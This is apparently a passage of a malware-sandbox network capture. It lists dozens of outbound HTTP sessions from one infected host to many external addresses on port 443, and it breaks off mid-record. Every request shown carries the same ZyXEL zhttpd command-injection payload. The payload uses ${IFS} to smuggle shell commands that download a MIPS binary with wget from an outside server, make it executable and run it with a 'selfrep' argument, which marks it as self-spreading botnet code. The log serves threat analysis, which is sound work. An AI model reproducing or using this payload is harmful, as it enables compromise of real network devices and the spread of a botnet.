                                                Jan 12, 2024 18:24:30.716500998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3092192.168.2.1333258209.105.6.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716546059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3093192.168.2.13508489.203.221.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716639042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3094192.168.2.135926454.184.175.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716712952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3095192.168.2.1343306113.228.213.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716773033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3096192.168.2.135566853.152.126.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716835976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3097192.168.2.134512812.235.91.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716909885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3098192.168.2.1340760130.65.93.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716980934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3099192.168.2.135001247.95.203.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717036963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3100192.168.2.1352380221.170.202.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717104912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3101192.168.2.1337588136.5.193.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717175007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3102192.168.2.133740440.76.159.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717242956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3103192.168.2.1345916103.223.12.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717308044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3104192.168.2.134851449.162.112.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717366934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3105192.168.2.1339134209.253.180.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717449903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3106192.168.2.1346844135.241.4.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717523098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3107192.168.2.134532632.62.128.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717587948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3108192.168.2.133932851.197.151.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717669964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3109192.168.2.1357186137.1.55.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717721939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3110192.168.2.135815440.68.158.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717787027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3111192.168.2.1340488102.138.99.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717863083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3112192.168.2.133989619.222.11.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717911005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3113192.168.2.1353136158.169.117.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.717991114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3114192.168.2.1345528152.6.232.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718074083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3115192.168.2.1359340182.13.199.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718131065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3116192.168.2.1358208144.208.83.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718173981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3117192.168.2.134307820.85.165.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718252897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3118192.168.2.1336180179.104.163.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718322039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3119192.168.2.133506447.76.106.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718399048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3120192.168.2.1352708130.52.195.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718461990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3121192.168.2.135887014.219.179.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718529940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3122192.168.2.1339424138.234.193.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718590021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3123192.168.2.1343682208.232.45.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718656063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3124192.168.2.134119276.66.16.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718703032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3125192.168.2.1352480161.133.40.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718786955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3126192.168.2.1357132104.238.157.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718847036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3127192.168.2.133705819.56.116.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718907118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3128192.168.2.1334490121.101.129.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.718993902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3129192.168.2.1351698210.18.98.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719064951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3130192.168.2.133410060.192.158.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719122887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3131192.168.2.1352588223.186.92.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719196081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3132192.168.2.133931820.166.160.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719260931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3133192.168.2.1347700196.186.246.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719325066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3134192.168.2.1337038103.212.253.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719413996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3135192.168.2.134955898.167.164.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719458103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3136192.168.2.133446865.210.165.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719506979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3137192.168.2.1333540183.139.0.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719594002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3138192.168.2.1335330122.171.19.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719619989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3139192.168.2.1344718194.241.18.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719705105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3140192.168.2.133280812.88.44.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719783068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3141192.168.2.1356074109.112.0.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719837904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3142192.168.2.134379023.94.183.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719894886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3143192.168.2.1342820212.113.61.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.719959021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3144192.168.2.1355208182.197.167.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720009089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3145192.168.2.1340238199.79.228.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720088005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3146192.168.2.1343560116.111.97.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720168114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3147192.168.2.1334842139.123.51.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720221043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3148192.168.2.1348846216.178.156.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720319033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3149192.168.2.1352446171.186.156.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720376968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3150192.168.2.1347250201.225.255.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720452070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3151192.168.2.1349384186.163.156.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720515966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3152192.168.2.1351834217.20.75.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720602036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3153192.168.2.1356812201.249.194.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720666885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3154192.168.2.133744250.101.133.125443
                                                TimestampBytes transferredDirectionData
